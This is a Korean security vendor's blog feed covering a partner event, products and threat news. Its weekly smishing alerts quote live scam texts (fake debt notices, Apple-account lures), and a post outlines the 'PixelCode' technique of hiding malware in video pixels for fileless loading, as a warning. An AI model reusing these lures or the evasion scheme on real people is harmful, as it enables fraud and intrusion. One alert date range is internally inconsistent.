이번 행사는 약 80개 파트너사, 100여 명의 파트너 관계자분들이 참석한 가운데 성황리에 마무리되었으며, AI와 보안이 만나는 새로운 전환점을 현장에서 생생하게 확인할 수 있었던 자리였습니다. 지금부터 그 뜨거웠던 현장을 공개합니다!

파트너와 함께 그리는 Security × AI : New Momentum

이번 Partner Kick-Off는 급변하는 보안 시장 환경 속에서 이스트시큐리티가 지향하는 중장기 사업 방향과 기술 전략을 파트너 여러분과 함께 공유하고, 동반 성장을 위한 협업 체계를 한층 강화하기 위해 마련된 자리입니다.

특히 새롭게 선임된 정상원 대표이사가 직접 참석해 이스트시큐리티의 비전과 2026년 핵심 전략을 파트너사와 함께 나누며 행사의 의미를 더했습니다.

2026년을 향한 핵심 메시지, Security × AI

이번 행사는 정상원 대표이사의 인사말을 시작으로, 이스트시큐리티의 미래 전략을 다각도로 조망할 수 있는 주요 세션들로 구성되었습니다.

행사 주요 세션

2026년 이스트시큐리티 B2B 사업 전략
2026년 보안 시장 동향 및 주요 제품 로드맵
AI 결합을 통한 보안 패러다임 변화
AI SW 사업 소개(Perso AI)
AX(AI Transformation) 사업 소개
2026년 보안 시장 변화와 파트너 성장을 위한 실행 전략

특히 개발혁신본부 김병훈 이사는 AI 기술을 보안에 접목한 전략적 방향성을 중심으로, AI 기반 위협 분석 및 대응 체계 고도화 방안과 이를 기반으로 한 신규 비즈니스 기회 창출 전략을 소개해 많은 관심을 받았습니다.

이스트시큐리티가 보유한 보안 기술력에 AI를 결합해 새로운 성장 동력을 만들어가는 방향성이 구체적으로 제시된 순간이었습니다.

상생 협력의 의미를 되새긴 ‘EST Partner Awards 2025’

[이미지] 참관객들과 대화하는 페르소 AI 휴먼 스테이션

행사 현장에서는 AI 기반 신시장과 관련된 기술과 비전을 보다 직관적으로 체험할 수 있는 구성도 함께 마련되었습니다. 또한 참석해주신 많은 파트너사 관계자분들께서는 저희를 미소짓게 하는 긍정적인 피드백을 주시기도 했습니다.

“AI 기반 보안 신시장을 직접 체감할 수 있어 인상 깊었다”
“각 세션이 실질적인 인사이트를 제공해 매우 유익했다"
“전반적인 행사 운영이 원활해 만족도가 높았다”

이러한 반응은 행사 종료 후 진행된 설문조사를 통해서도 확인되었으며, 파트너사 관계자분들 역시 현장에서 AI 보안의 가능성과 방향성을 직접 체감할 수 있었던 자리였음을 보여주었습니다.

행사 후반에는 지난 한 해 동안 우수한 성과를 거둔 파트너사를 시상하는 ‘EST Partner Awards 2025’가 진행되었습니다. 이번 시상식은 단순한 성과 공유를 넘어, 이스트시큐리티와 파트너사가 함께 만들어 온 신뢰와 협력의 시간을 되돌아보는 자리로, 상생 협력의 가치를 다시 한 번 되새기는 의미 있는 시간이었습니다.

AI 시대, 파트너와 함께 보안 시장을 선도하겠습니다

정상원 이스트시큐리티 대표는 '보안 전문 기업 이스트시큐리티의 핵심 역량에 AI 기술을 결합해 신성장 동력을 만들어가는 것이 2026년의 핵심 전략'이라며, '파트너사와의 긴밀한 협력을 바탕으로 AI 시대 보안 시장을 선도해 나가겠다'고 밝혔습니다.

이스트시큐리티는 이번 Partner Kick-Off 2026에서 공유된 전략과 방향성을 바탕으로, 파트너 중심의 사업 구조를 더욱 강화하고 AI 기반 보안 사업을 본격적으로 확대해 나갈 계획입니다.

이번 행사가 성공적으로 마무리될 수 있도록 함께해주신 모든 파트너사 여러분과, 보이지 않는 곳에서 행사를 준비해주신 임직원 여러분께 깊이 감사드리며, 앞으로 이어질 이스트시큐리티의 2026년 행보에도 많은 관심과 기대를 부탁 드립니다!

님 (주)다날 장기미납으로 법원출석 등기발송예정 1,227,369원 기업은행 480**0797105

알약4 — Fri, 6 Feb 2026 10:14:21 +0900

[2월 첫째주]

알약 스미싱 알림 본 포스트는 알약M 사용자 분들이 '신고하기' 기능을 통해 알약으로 신고해 주신 스미싱 내역 중 '특이 문자'를 자체 수집, 집계하여 제공해 드리는 정보성 포스트입니다.

특이 문자

No.	문자내용
1	님 (주)다날 장기미납으로 법원출석 등기발송예정 1,227,369원 기업은행 480**0797105
2	[국외발신][애플]귀하의 계정에 이상이 감지되었습니다. 확인해주시기 바랍니다. s****e.cc

출처 : 알약M
기간 : 2026년 1월 24일 ~ 2025년 1월 30일

macOS를 노리는 파이썬 기반 인포스틸러 공격

알약5 — Thu, 5 Feb 2026 15:41:28 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

그동안 인포스틸러(Infostealer) 공격은 주로 윈도우 환경을 중심으로 확산돼 왔습니다. 그러나 최근 사이버 위협 동향은 이러한 인식을 빠르게 무너뜨리고 있습니다. macOS 사용자 역시 더 이상 안전지대가 아니라는 사실이 분명해지고 있습니다.

최근 해외 보안 매체 Cyber Security News는 파이썬(Python)을 기반으로 한 인포스틸러 공격이 macOS 환경으로 확산되고 있다고 보도했습니다. 해당 공격은 악성 광고나 가짜 애플리케이션 설치를 유도하는 방식으로 시작되며, 계정 정보, 키체인(Keychain), 가상자산 지갑 데이터 등 민감한 정보를 탈취하는 것을 목적으로 합니다.

[이미지] 생성형 AI 제작

‘신뢰 가능한 도구’를 가장한 침투 방식

이번 공격의 가장 큰 특징은 macOS 사용자들이 일상적으로 신뢰해온 플랫폼과 도구를 교묘하게 악용했다는 점입니다. 공격자는

AMOS(Atomic macOS Stealer)와 같은 macOS 전용 인포스틸러를 활용해 정상적인 소프트웨어, 개발 도구, PDF 유틸리티, 메신저 등으로 위장합니다. 특히 파이썬 기반 스크립트를 통해 설치 및 실행 과정을 자동화하고, macOS의 내장 유틸리티와 자동화 기능을 악용함으로써 기존 보안 솔루션의 탐지를 우회합니다.

여기에 터미널 명령어를 그대로 복사·실행하도록 유도하는 사회공학 기법도 함께 사용됩니다. 개발자나 IT 실무자에게 익숙한 작업 방식이라는 점을 노린 것으로, 사용자의 단 한 번의 실행이 시스템 전반의 정보 탈취로 이어질 수 있습니다.

개인 단말 침해에서 기업 리스크로의 확산

이러한 인포스틸러 공격의 위험성은 단순한 개인 정보 유출에 그치지 않습니다. 맥 환경에서 관리되던 기업 소스 코드, 클라우드 접근 권한, 협업 도구 계정 정보가 탈취될 경우, 이는 공급망 공격이나 랜섬웨어로 이어지는 2차 피해의 출발점이 될 수 있습니다.

특히 최근 기업 환경에서는 개발·디자인·기획 조직을 중심으로 macOS 사용 비중이 빠르게 증가하고 있으며, 클라우드 기반 업무와 외부 협업이 일상화된 상황입니다. 공격자는 단 한 대의 맥 단말을 발판으로 조직 내부로 침투할 수 있는 구조를 이미 확보하고 있는 셈입니다.

macOS 환경에서도 요구되는 전문적인 보안 대응

이번 사례를 통해 우리는 분명히 알 수 있습니다. '맥은 상대적으로 안전하다'는 인식은 더 이상 유효하지 않습니다.

신뢰 가능한 플랫폼과 정상적인 업무 흐름을 악용하는 지능형 공격이 증가하는 상황에서, 운영체제 기본 보안 기능만으로는 위협을 식별하고 대응하기 어렵습니다. macOS 환경 역시 행위 기반 탐지, 실시간 모니터링, 중앙 관리가 가능한 전문적인 엔드포인트 보안 체계와 함께, 사용자 보안 인식 강화가 병행돼야 합니다.

macOS 환경까지 고려한 엔드포인트 보안 전략

macOS를 겨냥한 인포스틸러 공격이 현실화된 지금, 기업 보안 전략 역시 운영체제 중심이 아닌 엔드포인트 전체를 아우르는 관점으로 확장될 필요가 있습니다.

특히 맥과 윈도우가 혼재된 환경에서는 특정 OS만을 기준으로 한 대응 방식이 오히려 보안 사각지대를 만들 수 있습니다.

Plus Tip! mac OS를 위한 최적의 백신 솔루션

알약 Mac은 macOS 전용 악성코드뿐 아니라 윈도우 기반 위협까지 함께 탐지하는 크로스 플랫폼 대응을 제공하며, 중앙 관리 시스템과 연동해 보안 정책 적용과 로그 관리까지 일관되게 운영할 수 있도록 지원합니다. 업무 환경에 부담을 주지 않는 경량 설계와 실시간 탐지 기능을 통해, 맥 환경에서도 점점 정교해지는 인포스틸러 공격에 선제적으로 대응할 수 있는 기반을 마련할 수 있습니다.

맥이 더 이상 '안전지대'가 아닌 지금, OS 구분 없는 엔드포인트 보안 전략은 선택이 아닌 필수가 되고 있습니다.

macOS 보안 인식 전환과 기업 대응의 필요성

macOS를 사용하는 기업 환경에서는 '맥은 상대적으로 안전하다'는 막연한 믿음 대신, 우리 조직의 맥 환경이 실제 공격 시나리오에 얼마나 노출돼 있는지 구체적으로 파악해야 합니다.

이스트시큐리티는 macOS를 포함한 엔드포인트 환경 전반에 대한 보안 컨설팅을 제공합니다. 단순히 보안 제품을 도입하는 것을 넘어, 귀사의 업무 구조와 협업 환경을 분석해 실제 공격이 발생했을 때 어떤 경로로 피해가 확산될 수 있는지를 시뮬레이션하고, 이를 차단할 수 있는 맞춤형 대응 체계를 수립합니다. 특히 개발·디자인·기획 조직의 맥 사용 환경에서 발생할 수 있는 보안 사각지점을 선제적으로 점검하고, 조직 상황에 맞는 현실적인 보안 정책을 마련할 수 있도록 지원합니다.

알약 Mac은 이러한 보안 체계 구축의 핵심 솔루션으로, macOS 전용 악성코드 탐지부터 윈도우 기반 위협 대응까지 통합 관리할 수 있는 기반을 제공합니다.

macOS가 더 이상 '안전지대'가 아닌 지금, 귀사의 맥 환경이 실제 위협에 얼마나 대비되어 있는지 점검해보시기 바랍니다.

제로트러스트는 왜 '거버넌스'에서 완성될까? '기술'에서 '운영 체계'로 전환되는 보안 전략의 핵심!

알약5 — Mon, 2 Feb 2026 15:56:31 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

제로트러스트(Zero Trust)는 더 이상 새로운 개념이 아닙니다. 그럼에도 불구하고 최근 기업 보안 환경에서 이 키워드가 다시 주목받는 이유는 분명합니다. 랜섬웨어, 내부자 위협, 공급망 공격처럼 경계 내부에서 시작되는 보안 사고가 일상화되었기 때문입니다. 기존의 경계 기반 보안만으로는 더 이상 기업의 핵심 자산을 충분히 보호하기 어렵다는 현실이 분명해지고 있습니다.

이 지점에서 하나의 질문에 도달하게 됩니다. '제로트러스트는 과연 기술 도입만으로 완성될 수 있을까요?'

답은 분명히 'NO'입니다. 그리고 그 핵심에는 거버넌스(Governance)가 있습니다.

[이미지] 생성형 AI 제작

솔루션은 도입했는데, 왜 보안은 여전히 불안할까?

많은 기업이 마주한 제로트러스트의 현실

많은 기업이 제로트러스트를 VPN 대체, MFA 도입, 접근제어 강화 수준으로 이해하고 있습니다. 실제로 관련 솔루션을 이미 도입한 기업도 적지 않습니다. 그러나 이러한 접근은 제로트러스트의 일부만 구현한 상태에 불과합니다.

제로트러스트의 본질은 단순한 기술 적용이 아니라, 신뢰를 전제로 한 구조 자체를 해체하고 모든 접근을 정책과 검증의 대상으로 만드는 운영 원칙이기 때문입니다.

현장에서 자주 나타나는 문제는 다음과 같습니다.

▪︎ 솔루션은 늘어났지만 보안 정책은 여전히 파편화된 상태

▪︎ 이상 행위는 탐지되지만, 누가 어떻게 대응해야 하는지 불명확

▪︎ 사고 발생 시 책임 소재와 판단 기준이 모호

▪︎ 규제 대응을 위한 감사 추적과 이력 관리가 제대로 이루어지지 않음

이러한 문제들은 기술의 부족이 아니라 거버넌스의 부재에서 발생합니다.

왜 지금 '제로트러스트 거버넌스'인가

[이미지] 제로트러스트 거버넌스 개념도

제로트러스트는 특정 기술이나 영역이 아니라, 모든 보안 영역을 정책과 의사결정 체계로 통제하는 운영 중심의 보안 거버넌스 모델입니다

거버넌스는 단순한 관리 체계가 아닙니다. 제로트러스트 환경에서 거버넌스는 다음 질문에 대한 명확한 답을 포함해야 합니다.

▪︎ 어떤 기준으로 접근을 허용하거나 차단하는가

▪︎ 정책은 누가 정의하고, 변경 권한과 책임은 어떻게 관리되는가

▪︎ 사고 발생 시 판단과 대응은 자동화되어 있는가

▪︎ 모든 결정과 행위는 감사 가능한 형태로 남는가

즉, 제로트러스트는 보안 기술의 집합이 아니라 보안 의사결정 구조의 전환입니다. 기술만 도입하고 거버넌스가 없다면, 제로트러스트는 복잡한 보안 환경과 책임이 불분명한 운영으로 이어질 수밖에 없습니다.

제로트러스트 환경에서 거버넌스가 달라져야 하는 이유

[이미지] 기존 보안과 제로트러스트 거버넌스 비교

1. 신뢰의 단위가 '네트워크'에서 '행위'로 이동

기존 보안은 '사내망에 들어왔는가'를 기준으로 신뢰를 부여했습니다. 그러나 재택근무, 클라우드, 외주 협업이 일상화된 지금, 네트워크 위치는 더 이상 신뢰의 기준이 될 수 없습니다.

제로트러스트 거버넌스는 사용자·디바이스·행위·맥락(Context)을 기준으로 접근을 판단합니다. 이 기준을 누가 어떻게 정의하고 운영하는지가 곧 기업의 보안 수준을 좌우합니다.

예를 들어,

▪︎ 특정 사용자가 비정상적인 시간대에 민감 데이터에 접근하려 할 때

▪︎ 새로운 디바이스에서 처음 로그인을 시도할 때

▪︎ 평소와 다른 지역에서 접근 요청이 발생할 때

이러한 상황에서 허용할 것인가, 추가 인증을 요구할 것인가, 차단할 것인가를 결정하는 기준이 바로 거버넌스입니다.

2. 정책 중심 보안으로의 전환

솔루션이 많아질수록 보안이 강해지는 것은 아닙니다. 각 솔루션이 서로 다른 기준과 정책으로 동작하면, 오히려 운영 복잡성과 관리 부담이 증가합니다.

제로트러스트 거버넌스에서는 모든 보안 통제가 정책을 중심으로 통합됩니다. 엔드포인트 보안 정책, 네트워크 접근 정책, 데이터 접근 권한 정책, 인증 강도 정책이 하나의 체계 안에서 일관되게 적용되고, 변경 이력과 검토 기록이 명확히 관리되어야 합니다.

3. '탐지'에서 '운영'까지 이어지는 책임 구조

보안 사고의 상당수는 탐지 실패가 아니라 대응 지연과 책임 불명확에서 발생합니다. 이상 행위가 탐지되었음에도 누가 확인하고, 누가 조치하며, 어떤 기준으로 판단하는지가 명확하지 않다면 사고는 확대될 수밖에 없습니다.

제로트러스트 거버넌스는 탐지 이후의 대응, 격리, 권한 회수, 재평가까지를 하나의 운영 흐름으로 묶습니다. 이는 사람의 판단에만 의존하지 않는 운영 자동화 체계를 전제로 합니다.

제로트러스트 거버넌스를 구성하는 핵심 요소

제로트러스트를 선언이 아닌 실제 운영 체계로 만들기 위해서는 다음 요소들이 유기적으로 연결되어야 합니다.

정책 엔진(Policy Engine):

사용자·디바이스·리스크 기반 접근 정책 정의, 동적 제어 규칙과 변경 이력 관리

가시성(Visibility):

모든 접근과 행위에 대한 실시간 모니터링과 이상 징후 기준선 설정

통합 로그 및 감사 체계(Audit & Compliance):

모든 보안 의사결정의 추적 가능성과 규제 대응을 위한 기록 관리

자동 대응 메커니즘(Automated Response):

이상 행위 발생 시 즉각적인 정책 기반 통제와 격리

중앙 관리 구조(Centralized Management):

단일 콘솔에서의 정책 관리와 전사 보안 현황 가시화

이 중 하나라도 빠진다면, 제로트러스트는 선언적 구호에 그치게 됩니다.

이스트시큐리티, 제로트러스트를 '운영 가능한 구조'로 만들다

이스트시큐리티는 제로트러스트를 엔드포인트 보안 중심의 통합 거버넌스 모델로 접근합니다. 단일 기술이나 제품이 아니라, 정책·탐지·대응·감사를 하나의 흐름으로 연결하는 것이 핵심입니다.

이를 기반으로 설계된 제로트러스트 통합 보안 플랫폼, 알약 ZePP는 다음과 같은 방향성을 갖습니다.

엔드포인트 행위 기반 위협 탐지와 단말 신뢰도 평가

FIDO2 기반 다중 인증과 정책 중심 접근 제어

XDR 기반 이벤트 연계를 통한 맥락 중심 보안 분석

모든 보안 의사결정 이력의 중앙 관리와 감사 대응

이는 '보안을 잘 하고 있는가?'라는 질문에 직관이 아닌 데이터와 정책으로 답할 수 있는 구조를 만드는 데 목적이 있습니다.

[이미지] 알약 ZePP 제로트러스트 아키텍처

제로트러스트의 완성은 '도입'이 아니라 '성숙도'입니다

제로트러스트는 한 번에 완성되지 않습니다. 중요한 것은 얼마나 많은 기술을 도입했는가가 아니라, 보안 의사결정이 얼마나 체계적으로 관리되고 있는가입니다.

거버넌스가 없는 제로트러스트는 아래와 같은 보안 취약점으로 이어질 수 밖에 없습니다.

복잡한 보안 환경
책임이 불분명한 운영
사고 이후에야 드러나는 취약점

이제 제로트러스트는 선택 가능한 기술 트렌드가 아니라, 기업 보안 성숙도를 판단하는 기준이 되고 있습니다. 그리고 그 중심에는 언제나 거버넌스가 자리하고 있습니다.

제로트러스트 거버넌스 구축, 어디서부터 시작해야 할까요?

많은 기업이 제로트러스트 도입을 고민하면서도 '어디서부터 시작해야 할지' 막연함을 느낍니다. 기술은 빠르게 발전하지만, 조직에 맞는 적용 순서와 범위를 정하는 일은 쉽지 않기 때문입니다.

이스트시큐리티의 알약 ZePP는 기술 도입이 아닌 보안 운영 체계의 전환을 함께 지원합니다.

현재 보안 환경 진단 및 제로트러스트 성숙도 평가
조직 특성에 맞춘 단계별 적용 로드맵 제시
정책 설계부터 운영 자동화까지 통합 지원

제로트러스트는 더 이상 먼 미래의 이야기가 아닙니다. 지금 이 순간에도 많은 기업이 거버넌스 기반 제로트러스트 체계를 구축하며 보안 운영의 새로운 기준을 만들어가고 있습니다.

제로트러스트 거버넌스 구축이 고민되신다면, 아래 도입 상담을 통해 지금 우리 조직에 맞는 적용 방안을 확인해 보시기 바랍니다.

[국외발신] [Apple] 귀하의 계정이 다른 장소에서 로그인되고 있습니다. 확인해주세요. app****.cc

알약4 — Fri, 30 Jan 2026 13:29:10 +0900

[1월 다섯째주]

No.	문자내용
1	[국외발신]귀하의 Apple ID 계정에 이상이 있습니다. 확인해 주세요. ap****-kr.com
2	[국외발신] [Apple] 귀하의 계정이 다른 장소에서 로그인되고 있습니다. 확인해주세요. app****.cc

출처 : 알약M
기간 : 2026년 1월 24일 ~ 2025년 1월 30일

공급망 보안이 무너지면, 모두가 무너진다! 럭스쉐어(Luxshare) 해킹 사고가 던진 경고

알약5 — Thu, 29 Jan 2026 15:40:18 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

글로벌 전자제품 위탁 생산 기업, 럭스쉐어(Luxshare) 가 랜섬웨어 공격을 받아 대규모 정보 유출 사고를 겪었습니다. 이번 공격의 파급력은 단일 기업의 피해를 넘어, 애플·엔비디아·테슬라 등 글로벌 빅테크 기업들까지 직접적인 보안 위협에 노출시켰다는 점에서 업계 전반에 큰 충격을 주고 있습니다.

이번 사고는 기업 보안의 최종 방어선은 결국 공급망이라는 사실을 다시 한번 명확히 보여주는 사례입니다.

협력사 보안 붕괴로 인한 빅테크 핵심 자산 노출

해외 보안 전문 매체 CPO Magazine에 따르면, 럭스쉐어는 랜섬웨어 조직 'RansomHub'의 공격을 받아 내부 데이터가 암호화됐으며, 공격자는 이를 빌미로 협상을 요구하고 있습니다. 협상이 결렬될 경우, 탈취한 기밀 정보를 공개하겠다고 위협하며 고객사까지 압박하는 전형적인 이중 협박(Double Extortion) 수법을 사용한 것으로 알려졌습니다.

문제는 유출된 데이터의 성격입니다.

미발표 제품의 3D CAD 모델, 회로도, 엔지니어링 문서뿐만 아니라 수년간 협업해 온 인력들의 개인정보까지 포함된 것으로 전해졌습니다. 이는 단순한 데이터 유출을 넘어, 산업 스파이 활동이나 위조품 제작, 기술 경쟁력 훼손으로 이어질 수 있는 매우 치명적인 사안입니다.

럭스쉐어 해킹 사고의 위험성 분석

이번 럭스쉐어 해킹 사고가 특히 심각하게 받아들여지는 이유는 세 가지입니다.

첫째, 공격 대상이 글로벌 제조 공급망의 핵심 노드였다는 점입니다.

빅테크 기업들은 내부 보안 투자를 강화해 왔지만, 협력사·위탁 생산 기업의 보안 수준까지 동일하게 관리하기는 쉽지 않습니다. 공격자는 바로 이 ‘연결 지점’을 노렸습니다.

둘째, 유출된 정보의 수명이 매우 길다는 점입니다.

설계도와 기술 문서는 단기간에 가치가 소멸되지 않습니다. 향후 수년간 글로벌 시장에서 경쟁 우위를 약화시키는 요소로 작용할 가능성이 큽니다.

셋째, 고객사까지 직접 협박 대상으로 삼았다는 점입니다.

이는 공급망 공격이 단순한 간접 피해를 넘어, 최종 기업의 의사결정과 평판까지 흔들 수 있음을 보여줍니다.

이번 사건은 모든 기업들에게 분명한 메시지를 주고 있습니다. 아무리 내부 보안 체계가 견고하더라도, 공급망 파트너 중 단 한 곳이라도 취약하다면 전체 생태계가 위험해질 수 있다는 점입니다.

특히 제조·IT·플랫폼 기업처럼 다수의 협력사와 설계·데이터를 공유하는 환경에서는, 공급망 보안이 곧 기업 보안의 수준을 결정합니다. 이제 보안은 ‘우리 조직 내부’만의 문제가 아니라, 연결된 모든 조직을 전제로 설계돼야 하는 문제가 되었습니다.

기업 보안 전략의 핵심 요소로서의 공급망 보안

럭스쉐어 해킹 사고는 단일 기업의 침해 사례를 넘어, 기업 보안 전략의 관점 자체를 다시 보게 만드는 사건입니다. 아무리 내부 보안 체계를 강화하더라도, 설계·제조·협업 과정에서 연결된 공급망 중 한 곳이라도 취약하다면 핵심 자산과 미래 제품 로드맵은 언제든 노출될 수 있습니다.

이제 공급망 보안은 보안 부서의 개별 과제가 아니라, 기업 차원의 전략적 판단 영역으로 이동하고 있습니다. 어떤 파트너와 어떤 방식으로 기술 자산을 공유할 것인지, 협력사 환경까지 포함해 어디까지를 동일한 보안 기준으로 관리할 것인지에 대한 명확한 기준 없이는, 공급망 리스크를 구조적으로 통제하기 어렵습니다.

결국 기업 보안 전략에서 중요한 것은 하나의 질문으로 정리됩니다.

공급망을 포함한 전체 협업 구조 안에서, 우리 기업의 핵심 자산을 통제할 수 있는가.

제조업 기업이 지금 점검해야 할 공급망 보안 포인트

이번 럭스쉐어 해킹 사고는 제조업 기업에게 특히 직접적인 시사점을 던집니다. 설계도, 도면, 공정 자료, 협력사 공유 문서 등 제조업의 핵심 경쟁력은 대부분 디지털 파일 형태로 협력사와 공유되고 있기 때문입니다. 이 과정에서 단 한 곳의 보안 공백만 발생해도, 공격자는 전체 공급망을 관통하는 치명적인 침투 경로를 확보하게 됩니다.

제조업 환경에서 공급망 보안을 강화하기 위해서는 다음과 같은 관점의 점검이 필요합니다.

☑︎ 협력사·외주 인력과 공유되는 기술 문서·설계 자산의 개인 PC 및 외부 저장매체 분산 여부

☑︎ 외부 반출 과정에서의 승인·이력 관리 및 다운로드 통제 체계

☑︎ 랜섬웨어 감염 또는 내부자 실수 발생 시 중앙 복구 가능 구조 및 대응 체계

☑︎ 협력사·프로젝트 단위의 접근 권한 분리 및 관리 수준

특히 글로벌 제조 공급망을 운영하는 기업일수록, 보안의 기준은 ‘내부 직원’이 아니라 협력사까지 포함한 전체 업무 흐름을 기준으로 설계돼야 합니다. 공급망 보안이 취약한 상태에서는 아무리 강력한 내부 보안 솔루션을 갖추고 있어도, 이번 사례처럼 핵심 기술 자산이 한 번에 노출될 수 있습니다.

이제 제조업 보안의 핵심 질문은 명확합니다.

우리 회사의 기술 자산은, 협력사 환경에서도 동일한 수준으로 보호되고 있는가?

이 질문에 확신 있게 답할 수 있을 때, 비로소 공급망 리스크로부터 자유로워질 수 있습니다.

Tip! 제조업 공급망 보안, 이렇게 시작할 수 있습니다

제조업 환경에서 공급망 보안을 실질적으로 강화하려면, 공격 유형별 개별 대응이 아니라 기업 핵심 자산을 보호하는 구조와 랜섬웨어 확산을 차단하는 대응 체계를 함께 고려해야 합니다. 이스트시큐리티는 제조업의 협업 구조와 공급망 리스크를 반영해 다음과 같은 보안 대응 방향을 제안합니다.

기업자산 보호 솔루션은 설계도, 도면, 기술 문서 등 제조업의 핵심 자산을 중앙에서 통제·관리함으로써, 협력사·외주 인력·프로젝트 단위 협업 과정에서 발생할 수 있는 정보 유출 위험을 구조적으로 줄이는 데 초점을 둡니다. 개인 PC나 외부 저장매체에 자산이 분산되는 환경을 최소화해, 공급망을 통한 기술 유출 가능성을 근본적으로 낮출 수 있습니다.

이스트시큐리티 데이터 보안 시나리오

랜섬웨어 대응 솔루션은 제조 공급망을 경유해 유입될 수 있는 랜섬웨어 공격을 사전에 탐지하고, 감염이 발생하더라도 피해 확산과 업무 중단을 최소화할 수 있도록 설계된 대응 체계를 제공합니다. 이는 협력사 보안 침해 이후 전사적 시스템 마비로 이어지는 최악의 시나리오를 방지하는 핵심적인 방어 수단입니다.

이스트시큐리티의 랜섬웨어 대응, 무엇이 다른가요?

백신 기술력 및 10년 이상의 엔드포인트 보안 운영 노하우를 통한 가시성 제공
랜섬웨어 분석 전문 인력 ESRC의 인텔리전스를 기반으로한 신속한 대응
신/변종 랜섬웨어 분류에 특화된 Threat Inside의 Deep Core 엔진
랜섬웨어 공격 대상인 문서에 대한 보안 솔루션, 파일관리시스템 기술 보유

제조업 공급망 보안의 핵심은 ‘무엇을 지킬 것인가’와 ‘침해 발생 시 어떻게 확산을 막을 것인가’에 대한 명확한 기준을 세우는 것입니다. 기업자산 보호와 랜섬웨어 대응이 함께 작동할 때, 복잡한 협업 환경에서도 핵심 기술 자산과 업무 연속성을 동시에 확보할 수 있습니다.

제조업 공급망 환경에 맞는 보안 체계가 필요한지, 현재 운영 중인 협업·자산 관리 구조에 어떤 보완이 필요한지 점검이 필요하다면, 이스트시큐리티의 공급망 보안 컨설팅을 통해 귀사 환경에 적합한 대응 방향을 확인해보시기 바랍니다.

[참고 출처]

Data Breach at Manufacturing Firm Luxshare Leaks Sensitive Files from Apple, Nvidia, Tesla, and Others – CPO Magazine

영상 픽셀 속 악성코드, '픽셀코드(PixelCode)' 공격기법

알약4 — Thu, 29 Jan 2026 11:02:24 +0900

최근 멀티미디어 파일의 픽셀(Pixel) 데이터를 악성 페이로드 저장소로 활용하는 이른바 ‘픽셀코드(PixelCode)’ 공격 기법이 등장하여 주의가 필요합니다. 이는 스테가노그래피(Steganography) 기술을 고도화하여 보안 솔루션의 탐지망을 정교하게 우회하는 방식입니다.

픽셀코드(PixelCode) 정의

바이너리 데이터를 사람이 인식하는 색상 정보(픽셀)로 변환하여 이미지나 영상 속에 삽입하는 기술입니다. 외형상 일반 미디어 파일과 구분이 어려운 것이 특징입니다.

픽셀코드 공격 시나리오 및 매커니즘

공격자는 신뢰 기반의 플랫폼과 파일리스(Fileless) 실행 기법을 결합하여 다음과 같은 다단계 프로세스를 수행합니다.

픽셀코드 공격 흐름도 (이미지 출처: Malicious PixelCode 프로젝트)

단계	상세 내용
1. Payload Preparation	C++ 기반 악성 EXE를 픽셀 단위 데이터로 인코딩하여 정상적인 MP4 영상 파일로 생성합니다.
2. Staging & Hosting	유튜브(YouTube) 등 합법적인 플랫폼에 영상을 업로드하여 네트워크 보안 장비의 탐지를 우회하고, 영상에서 데이터를 추출할 '스테이저'를 포함한 최종 배포용 '로더(Loader)'를 제작합니다.
3. Infection & Execution	감염된 PC에서 로더가 영상을 다운로드 후, 메모리 상에서 픽셀을 바이너리로 복원하여 실행합니다. (C2 서버 연결)

주요 위협 요인 및 분석 회피 기술

비실행 포맷(Non-executable) 활용: 백신이 MP4 파일을 스캔할 때 픽셀 값에 분산된 데이터는 명확한 코드 구조나 시그니처가 존재하지 않아 정적 분석 단계에서 식별이 어렵습니다.
정상 트래픽 위장: 대형 스트리밍 도메인과의 통신은 기업 보안 환경에서 기본 허용되어 있어 트래픽 분석을 우회합니다.
파일리스(Fileless) 및 프로세스 인젝션: 디스크 쓰기 없이 메모리 상에서 직접 동작하여 흔적을 최소화하며, 정상 프로세스에 인젝션되어 동작될 경우 보안 솔루션이 정상 행위로 오인할 수 있습니다.

대응 전략 및 보안 권고 사항

개인 사용자 가이드

출처 불분명한 영상 다운로드, 코덱 설치 요구 주의
공식 플랫폼 외의 영상 다운로드 도구 사용 지양
OS 및 엔드포인트 보안 엔진 최신 버전 유지

기업 보안 관리자 가이드

CDR(Content Disarm & Reconstruction) 기술 검토
특정 프로세스의 비정상적인 외부 통신(EDR/XDR) 모니터링
제로 트러스트 기반의 콘텐츠 검증 체계 강화

이번 픽셀코드 공격 사례에서 알수 있듯, 공격자는 더 이상 시스템 취약점만을 노리지 않고 ‘이미지나 영상 파일은 비교적 안전하다’는 사용자의 인식을 악용하고 있습니다.

이러한 스테가노그래피 기반 위협에 대응하기 위해서는 출처가 불분명한 파일을 의심하고, 모든 디지털 콘텐츠를 검증 대상으로 바라보는 기본적인 보안 습관이 무엇보다 중요합니다.

[참고]

https://github.com/S3N4T0R-0X0/Malicious-PixelCode/blob/main/README.md

MS, Office 제로데이 취약점 긴급 패치

알약4 — Wed, 28 Jan 2026 10:34:48 +0900

마이크로소프트는 Office에서 발견된 보안 기능 우회 취약점에 대해 긴급 업데이트를 배포했습니다.

이번에 발견된 취약점은 Office가 신뢰할 수 없는 입력값에 의존해 보안 결정을 내리는 과정에서 발생하며, 이를 악용하면 인증되지 않은 공격자가 정상적인 Office 보안 보호 기능을 우회할 수 있습니다.

해당 취약점을 성공적으로 악용하려면 취약한 COM/OLE 컨트롤 호출 페이로드가 삽입된 오피스 문서를 사용자가 직접 실행하는 '사용자 상호작용(User Interaction)' 단계가 필수적입니다.

사용자가 문서를 열람하는 순간, OLE 보안 보호 체계가 논리적으로 우회되면서 별도의 경고 창 없이도 백그라운드에서 임의의 악성 코드가 실행될 수 있습니다.

해당 취약점은 이미 실제 공격에서 악용된 사례가 보고된 제로데이 취약점이므로 사용 중인 오피스 제품군에 대해 즉시 보안 패치를 적용하실 것을 권고 드립니다.

CVE번호

CVE-2026-21509

영향 받는 버전

Microsoft Office 2016

Microsoft Office 2019

Microsoft Office 2021

Microsoft Office LTSC 2021

Microsoft Office LTSC 2024

Microsoft 365 Apps for Enterprise (클라우드 기반 구독형)

패치 방법

대상 제품	보호 방식	조치 방법	비고
Office 2021	서비스 측 자동 보호 (Service-side change)	Office 앱 종료 후 재실행	별도 패치 설치 불필요
Office LTSC 2021 / 2024	서비스 측 자동 보호 (Service-side change)	Office 앱 종료 후 재실행	재시작 시 보호 적용
Microsoft 365 Apps	서비스 측 자동 보호 (Service-side change)	Office 앱 종료 후 재실행	최신 상태 유지 권장
